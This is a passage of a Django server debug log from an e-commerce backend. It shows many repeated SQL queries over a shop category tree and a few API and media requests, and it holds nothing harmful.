"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:04:22,503 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:04:22,505 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:04:22,509 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:04:22,511 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:04:22,513 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:04:22,516 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:04:22,518 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:04:22,522 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:04:22,524 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:04:22,526 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:04:22,529 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:04:22,531 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:04:22,533 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:04:22,537 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:04:22,541 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:04:22,544 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:04:22,548 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:04:22,551 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:04:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:04:57,719 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:04:57,728 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:04:57,733 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:04:57,735 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:04:57,738 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:04:57,740 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:04:57,743 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:04:57,745 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:04:57,747 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:04:57,754 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:04:57,757 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:04:57,759 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:04:57,762 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:04:57,764 utils 20136 140506652825344 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 14:04:57,768 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:04:57,771 utils 20136 140506652825344 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:04:57,773 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:04:57,776 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [13/Dec/2019 14:04:57] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-13 14:04:57,779 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:04:57,782 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:04:57,784 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:04:57,788 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:04:57,791 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:04:57,793 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:04:57,796 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:04:57,798 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:04:57,801 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:04:57,804 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:04:57,807 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:04:57,809 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:04:57,812 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:04:57,814 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:04:57,818 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:04:57,821 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:04:57,823 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:04:57,825 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:04:57,828 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:04:57,832 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:04:57,834 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:04:57,837 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:04:57,839 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:04:57,841 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:04:57,844 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:04:57,847 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:04:57,851 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:04:57,855 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:04:57,859 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:04:57,863 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:04:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:04:58] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:05:09,607 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", 